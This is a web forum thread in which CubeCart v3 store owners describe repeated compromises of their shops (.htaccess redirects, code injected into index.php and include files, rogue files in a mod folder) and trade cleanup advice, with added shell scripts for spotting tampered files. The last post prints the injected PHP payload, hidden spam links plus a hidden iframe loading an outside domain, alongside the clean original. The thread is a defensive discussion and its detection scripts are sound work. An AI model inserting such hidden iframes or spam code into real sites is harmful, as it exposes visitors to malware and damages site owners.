Dang hackers

Guest

So the last few days, I've had someone alter the .htaccess file on one of my CubeCart v3 stores to redirect to a Chinese escort site!

When it first happened, the store was still on v3 2.0.14 and I also found some code added to /index.php. I updated everything to 3.0.20, and cleaned the compromised files. I also disabled tellafriend (deleted all code from the file).

It is shared hosting (in fact, I have a master account with unlimited domains and databases - it was only on one of the 20+ sites I have on the same account - not all are active or cubecart).

It just happened again, after I upgraded to 3.0.20 and did the above steps! I changed the account password though my hosts didn't think they were getting in via the account but felt it was probably exploiting an outdated script.

I cannot think of any scripts or anything on that site that aren't on my other live sites, so I'm scratching my head as to how this person is getting in. The only scripts I can think of beyond the usual CC ones are chat4support live chat and some Google Friend Connect, Facebook, and Twitter scripts (but again, they are on all my other stores as well).

So I thought I'd ask if anyone has had anything similar happen and if you figured out how they got in or how to stop it?

Thanks!


They managed to do it AGAIN after I have changed my password (to a totally randomly generated combo of letters, numbers, upper/lower etc).

I have been searching all over the files to try to find some script they put in that keeps being triggered, but no luck so far. :rolleyes:

So annoying since they are doing it to a site I advertise as being "kid friendly" - which is probably why they targeted it I know.

I deleted my google friend connect scripts since I wasn't using it much on that site anyway, but am at a loss of what else to try.


This is still happening every day. Any idea of how I can stop it? I've changed passwords, deleted everything I can find script wise, changed chmod to 004 on .htaccess - and still they are somehow redirecting the thing to an escort service!

With Halloween approaching, this is about to be my biggest site (cosplaycostumecloset.com) and I honestly don't know what the heck to try next :rolleyes:

This could be an attack from a compromised script on another user's site/account on the server.

Is the .htaccess file being overwritten, or edited?

I.e., does it still contain any customisation/SEO bits, or is it now simply a redirect?

Also check the date/time of the last change - is it always the same time each day?

Ensure all other scripts are up to date - check their forums/change notes for updates. Just because your other sites are not affected does not mean the scripts are not the entry vector!

Check the languages/homepage folder on CubeCart is not writeable, I know that used to be recommended.

Also see if you can get the raw HTTP logs and FTP logs.

The best people to help with this would be your hosting company. They should have access logs - if you can determine the time of the change, they should be able to work out what is going on.

Jason


Well, thought I had it solved but today someone edited my index.php file in the root directory. Quickly solved it by uploading my backup page, but...

wasn't to the same escort site, this one was about footwear. ;)

I don't know if they edited or replaced my files - and my hosting company doesn't think they are hacking into my account itself (since I've changed the password to an auto generated random one, I'm also doubting they are doing that), but cannot figure out how to lock them out for good :(

If they are getting in via cross-site-scripting (XSS), then the hack will involve calling a script on your site(s). This request will generate an event in the web server log.

Tell the hosting company the exact date+time of the attack, and get them to check the apache raw logs for anything suspicious.

Also ask them for the same info on FTP.

It's in the host's interest to assist you with this, and leaving you with constant attacks like this is not good.

You may have access to the raw logs - in which case PM them to me.

  • 2 weeks later...
Guest bluebadger66

I do not know too much about this type of problem, but when I had fears that my files were being changed, my hoster advised me to check my file permissions. There were lots that were set for anyone to write to.

It is just a thought, and I am sure there is an article on here somewhere.

Cheers,

Martin

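The checks Jason and Martin suggest above (world-writable files, the time of the last change, and what else was touched around it) are quick to run over a store's document root from an SSH session. This is an added example, not code from the thread; it assumes a POSIX shell with find(1) and ls(1), and the paths in the usage comments are made up for illustration.

```shell
#!/bin/sh
# Added example, not code from the thread: the file-system checks suggested
# above, as shell functions you can run over a store's document root.
# Assumes a POSIX shell with find(1) and ls(1). Paths in the usage comments
# are constructed for illustration.

# List every file and directory under $1 that any user on the server can write
# to (the "other" write bit). On shared hosting this is what lets a script in
# someone else's account, or a web-server worker, rewrite your .htaccess.
find_world_writable() {
    find "$1" -perm -o+w \( -type f -o -type d \) | LC_ALL=C sort
}

# List regular files under $1 modified within the last $2 days. Run it right
# after an incident; the timestamps are what the host needs to pull the
# matching lines out of the raw HTTP and FTP logs.
find_recent() {
    find "$1" -type f -mtime -"$2" | LC_ALL=C sort
}

# Show mode, owner and last-modified time of one file, e.g. the .htaccess that
# keeps being rewritten. If the time is the same every day, the rewrite is
# almost certainly a scheduled script rather than a person at a keyboard.
show_file_status() {
    ls -l "$1"
}

# Usage (hypothetical paths):
#   find_world_writable /home/account/public_html
#   find_recent /home/account/public_html 1
#   show_file_status /home/account/public_html/.htaccess
```

Anything `find_world_writable` prints is worth fixing before the logs are even read, and the list from `find_recent` gives the host exact times to search for in the access and FTP logs.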

I *think* I finally have them stopped. I changed permissions on my htaccess and they haven't redirected it since.

I have been slowly updating all my stores to 3.0.20 as well and deleting the tellafriend scripts just to be on the safe side.

Thanks for the help and suggestions guys. So far, so good though :(


  • 2 weeks later...

Well, update. My hacker doesn't seem to be able to redirect my page anymore - think the htaccess chmod stopped that. But today I discovered they had added marquee text to the top and bottom of my index.php (the root file) above and below the normal CubeCart code (easy to delete really and it was unreadable on the site since the text overwrote itself). Haven't found any scripts added that aren't supposed to be there, but it's still annoying :(

This is still happening like once a week. Any ideas?


You must convince your hosting provider to install an access and file modification logging tool on the several server directories that hold your site's files, and make those logs available to you. If they aren't working to find the method of intrusion themselves - and the server techs have this responsibility sitting squarely on their shoulders - then this has to be a breach in even the crummiest service level agreement.

And you haven't told us whether your host has admitted if any of the other sites hosted on that particular server have been vandalized. If so, then the vandals are reaching your directories through someone else's vulnerability.

As you describe it, you found "marquee text" above the CC code in {root}/index.php. So I guess whatever that was, wasn't meant to be sent immediately out to the browser since if it did, that should have caused a "Headers already sent" error.


I actually haven't talked to my hosts about it much after the first attack. They usually just tell me to check that all scripts are up to date which is why I updated that cubecart installation to v3.0.20. Honestly, not sure what I'm looking for in logs. I have them, just no clue what to look for. I'm assuming you mean the raw access logs??? Or is it called something else?

No errors are triggered. The code is being added above and below the existing CubeCart code in root/index.php, outside the PHP start and end tags. At the bottom, it's added after a ton of blank lines; at the top, it's a single line of code with tons of links added above the <?php and all the code.

I'm assuming it is a script they are using to insert this code? The chmod on that file is 644 - I cannot make it 444 (I've tried and it reverts itself back), so really not sure how to totally keep them from doing it.


Fingers crossed but I think I finally found where they were getting in. I found 2 files, link.php (which was encrypted) and llink.php in /includes/goobermods/coupon_giftcard_manager (Goober's coupon mod) and when I looked at the original files for the mod (and where it is installed on another of my stores), discovered these files shouldn't be there. I deleted them both and changed permissions on both folders to 555 so hopefully that will stop it this time. I'll let you know if it does or not but if anyone else has this issue, look *everywhere* for files you don't recognize. I had compared all the files to the v3.0.20 standard files, but had skipped the mods! (silly me)!

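The comparison Mysty did by hand above (live files against the stock 3.0.20 files plus the original files of each installed mod) is exactly what turned up llink.php, and it is easy to script so that the mods are never skipped. The following is an added example, not code from the thread or from CubeCart: it checksums two trees and reports modified, extra and missing files. It assumes POSIX sh, find(1), awk(1) and either sha256sum(1) or cksum(1); the directory names in the usage comment are made up.

```shell
#!/bin/sh
# Added example, not code from the thread: compare a live store tree against a
# clean reference (a fresh unpack of the same CubeCart version plus the original
# files of every installed mod) and report files that differ, files present only
# in the live tree (llink.php was one) and files that have gone missing.
# Assumes POSIX sh, find(1), awk(1) and sha256sum(1) or cksum(1).

# Checksum one file. SHA-256 where coreutils is available, POSIX cksum otherwise.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        cksum "$1" | cut -d' ' -f1,2 | tr ' ' '-'
    fi
}

# Print "relative-path<TAB>hash" for every regular file under $1, sorted by path.
# Paths are taken relative to $1 so two trees can be matched up by name.
manifest() {
    ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
        printf '%s\t%s\n' "${f#./}" "$(hash_file "$f")"
    done )
}

# Compare reference tree $1 with live tree $2. One line per finding:
#   MODIFIED <path>   same file, different content
#   EXTRA <path>      only in the live tree (anything here deserves a look)
#   MISSING <path>    only in the reference tree
compare_trees() {
    {
        manifest "$1" | awk -F'\t' -v OFS='\t' '{ print "R", $1, $2 }'
        manifest "$2" | awk -F'\t' -v OFS='\t' '{ print "L", $1, $2 }'
    } | awk -F'\t' '
        $1 == "R" { ref[$2] = $3; next }
        $1 == "L" { live[$2] = $3; next }
        END {
            for (p in ref) {
                if (!(p in live)) print "MISSING " p
                else if (ref[p] != live[p]) print "MODIFIED " p
            }
            for (p in live) if (!(p in ref)) print "EXTRA " p
        }' | LC_ALL=C sort
}

# Usage (hypothetical paths):
#   compare_trees /home/account/clean-3.0.20-with-mods /home/account/public_html
```

The reference tree has to be built from the same version and the same mods as the live store, otherwise every mod file shows up as EXTRA; keep that reference outside the web root so it cannot be tampered with by the same route.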

Guest fandango

Hiya Mysty,

This sounds like a hack attack I had not long ago. Unfortunately I had to completely delete and reinstall all my files and folders and install a fresh copy of CC3.

I do remember reading up on this Zombie attack as it was called and they injected code into the index.php files from scripts that had been inserted into the images folders.

I hope you sort it out and don't have to do what I did. (Took forever)

Fandango


My site has been hacked today too.

Customer got a browser warning:

"Visiting this site may harm your computer

The website at www..... contains elements from the site robingood.cz.cc which appears to host malware - software"

It had infected the root/index.php, admin/index.php, admin/modules/index.php & admin/modules/3rdparty/index.php

No idea how they got in, nor how to stop them from doing it again. Any suggestions please?

thanks


I'm also getting an error on the Admin home page:

Warning: MagpieRSS: Failed to fetch http://forums.cubecart.com/index.php?act=rssout&id=1 (HTTP Response: HTTP/1.1 404 Not Found ) in /classes/rss_fetch.inc on line 238

Warning: Invalid argument supplied for foreach() in /admin/index.php on line 152


Same suggestion as we gave Mysty - contact your host and ask for the access logs for your site, HTTP requests and FTP logins, and ask your host for help in discovering the vulnerability. Ask your host to put a logging tool on your site that logs all accesses, regardless of method, to your store root.

I am not familiar with Linux, so my knowledge of if such a tool exists is null, but I am confident a Linux Guru somewhere has created such a tool.

Warning: MagpieRSS:

Remove the RSS URL from the settings page. A number of messages on this board are mentioning that. Maybe a problem with cubecart.com?


  • 2 weeks later...

The latest files I found compromised were /admin/misc/licForm.php and lookupip.php. I re-uploaded the uncorrupted files and changed their file permissions to 444 to see if that stops it.


  • 4 weeks later...

Well, update

I've found inserted code into just about all my includes files. No idea how it all got there, but thought I'd give someone else an idea of where to look for changes :( Some of them were repeated more than once, sometimes the block was there just once. I copied what *should* have been there and pasted it over the junk. These are right under the cubecart comment block at the top of the files.

if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {
	echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><div id='302'><h2><a href='http://www.2daban.cn/' title='西门子PLC' >西门子PLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/'  title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('3'+'0'+'2').style.display='n'+'o'+'ne'</script><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe><div id='257'><h2><a href='http://www.2daban.cn/' title='西门子PLC' >西门子PLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/'  title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('2'+'5'+'7').style.display='non'+'e'</script></body>\r\n</html>";
	exit;
}

What the code *should* look like is:

if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {
	echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n</body>\r\n</html>";
	exit;
}

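The two tamperings reported in this thread leave recognisable traces: text outside the PHP tags at the top or bottom of index.php (the marquee/link block), and the hidden link farm with a 1x1 `display:none` iframe echoed from the includes in the post above. The following is an added example, not code from the thread or from CubeCart: signature checks for exactly those traces, so the includes and mods can be swept in one pass instead of opening each file. It assumes POSIX sh, find(1), awk(1) and grep(1); the paths in the usage comment are made up.

```shell
#!/bin/sh
# Added example, not code from the thread: scan a tree of PHP files for the
# two kinds of tampering reported above. These are signature checks for this
# particular intrusion, not a general malware scanner; treat hits as leads.
# Assumes POSIX sh, find(1), awk(1) and grep(1). Paths are constructed.

# Print the path if the first non-blank line of $1 does not start with "<?php".
# CubeCart's own PHP files all open with the tag, so anything before it was added.
leading_junk() {
    awk 'NF { if ($0 !~ /^<[?]php/) print FILENAME; exit }' "$1"
}

# Print the path if non-blank text follows the last "?>" in $1 (the marquee
# block was appended "after a ton of blank lines"). Heuristic: a "?>" inside a
# PHP string also resets the check, so review hits by hand.
trailing_junk() {
    awk '/[?]>/ { after = 1; junk = 0; next }
         after && NF { junk = 1 }
         END { if (junk) print FILENAME }' "$1"
}

# Succeed if $1 carries the markers of the echoed payload quoted above: an
# iframe styled display:none, or JavaScript that hides an element by id.
# Neither belongs in a .inc.php file.
has_injection_markers() {
    grep -q -E -i '<iframe[^>]*display: *none|getElementById\([^)]*\)\.style\.display' "$1"
}

# Walk $1 and print one line per finding, tagged with the check that fired.
scan_tree() {
    find "$1" -type f -name '*.php' | LC_ALL=C sort | while IFS= read -r f; do
        if [ -n "$(leading_junk "$f")" ]; then printf 'LEADING-JUNK %s\n' "$f"; fi
        if [ -n "$(trailing_junk "$f")" ]; then printf 'TRAILING-JUNK %s\n' "$f"; fi
        if has_injection_markers "$f"; then printf 'INJECTED-MARKUP %s\n' "$f"; fi
    done
}

# Usage (hypothetical path):
#   scan_tree /home/account/public_html
```

Every hit still needs a look against the clean copy of that file, since a legitimate template could in principle set `display:none`; the value of the scan is that it covers the includes and mod folders that a by-hand comparison tends to skip.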